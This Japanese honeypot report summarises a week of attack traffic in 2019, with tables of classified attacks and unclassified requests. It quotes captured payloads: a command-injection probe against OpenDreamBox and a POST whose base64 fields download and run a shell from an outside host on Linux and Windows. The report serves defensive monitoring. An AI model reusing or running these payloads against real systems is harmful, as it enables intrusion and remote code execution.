BW-Potのログ分析 (2019/08/04-2019/08/10)
期間内の総アクセス件数は 13,320件です。送信元IP数は421IPです。
・新規判定
OpenDreamBoxのRCE脆弱性に関する通信を検知しました。
GET /webadmin/script?command=|busybox
https://www.exploit-db.com/exploits/42293
・判定済みの通信の件数
判定用シグネチャ
https://drive.google.com/open?id=1LacSz941gxFEPy4gAAtTGWWly5DlIivceWOkoMgWaB4
| 件数 | 種別 |
| 9847 | phpMyAdminに対するブルートフォース攻撃 |
| 2454 | Bad Request |
| 357 | アクセス |
| 241 | Tomcat管理ページへのブルートフォース攻撃 |
| 108 | phpMyAdminに関する調査 |
| 26 | ZmEuによるスキャン |
| 16 | ThinkPHPに対する攻撃 |
| 8 | クローリング |
| 7 | ThinkPHPに関する調査 |
| 6 | FreePBXに関する調査 |
| 4 | Spring Data Commonsの脆弱性(CVE-2018-1273)に関する攻撃 |
| 2 | Netgear ルータ DGN1000 に関する攻撃 |
| 2 | OpenDreamBoxの脆弱性を狙った攻撃 |
| 2 | SSL証明書発行時の一時ファイルの調査 |
| 2 | サイトの構成調査 |
| 1 | Kubernetesに関する調査 |
| 1 | Linksysの脆弱性に関する調査 |
| 1 | Tomato RAFに関する調査 |
| 1 | WebDAVに関する調査 |
| 1 | WordPressに関する調査 |
・不明な通信
| method | uri | request_body |
| GET | /.aws/credentials | |
| GET | /000000000000.cfg | |
| GET | /64167f0000000.cfg | |
| GET | /Public/home/appjs/Index.js | |
| GET | /aastra.cfg | |
| GET | /admin/connection/ | |
| GET | /images/ | |
| GET | /manager/images/asf-logo.svg | |
| GET | /manager/images/tomcat.gif | |
| GET | /manager/text/list | |
| GET | /mini/ | |
| GET | /msdn.cpp | |
| GET | /requested.html | |
| GET | /secure/ContactAdministrators!default.jspa | |
| GET | /shell?busybox | |
| GET | /y000000000000.cfg | |
| GET | /y000000000005.cfg | |
| GET | /y000000000007.cfg | |
| GET | /y000000000025.cfg | |
| GET | /y000000000028.cfg | |
| GET | /y000000000029.cfg | |
| GET | /y000000000031.cfg | |
| GET | /y000000000032.cfg | |
| GET | /y000000000034.cfg | |
| GET | /y000000000035.cfg | |
| GET | /y000000000036.cfg | |
| GET | /y000000000038.cfg | |
| GET | /y000000000044.cfg | |
| GET | /y000000000045.cfg | |
| GET | /y000000000046.cfg | |
| GET | /y000000000052.cfg | |
| GET | /y000000000053.cfg | |
| GET | /y000000000054.cfg | |
| GET | /y000000000065.cfg | |
| GET | /y000000000066.cfg | |
| GET | /y000000000067.cfg | |
| GET | /y000000000068.cfg | |
| HEAD | /acadmin.php | |
| HEAD | /images/ | |
| OPTIONS | / | |
| POST | /ServiceControl/app | &pwd=sjdhnjhgGa1S65Wdnjs8&&ulinux=http://auth.to0ls[.]com:443/shell&clinux=Y2htb2QgK3ggL3RtcC9zaGVsbCA7IC90bXAvc2hlbGwK&cwin=Y21kLmV4ZSAvYyBwb3dlcnNoZWxsLmV4ZSAtbm9wIC1ub25pIC13IGhpZGRlbiAtZW5jIFNRQkZBRmdBSUFBb0FDZ0FiZ0JsQUhjQUxRQnZBR0lBYWdCbEFHTUFkQUFnQUc0QVpRQjBBQzRBZHdCbEFHSUFZd0JzQUdrQVpRQnVBSFFBS1FBdUFHUUFid0IzQUc0QWJBQnZBR0VBWkFCekFIUUFjZ0JwQUc0QVp3QW9BQ2NBYUFCMEFIUUFjQUE2QUM4QUx3QmhBSFVBZEFCb0FDNEFkQUJ2QURBQWJBQnpBQzRBWXdCdkFHMEFPZ0EwQURRQU13QXZBSFlBWlFCeUFHTUFhQUJsQUdNQWF3QXVBSEFBY3dBeEFDY0FLUUFwQUE9PQo= |
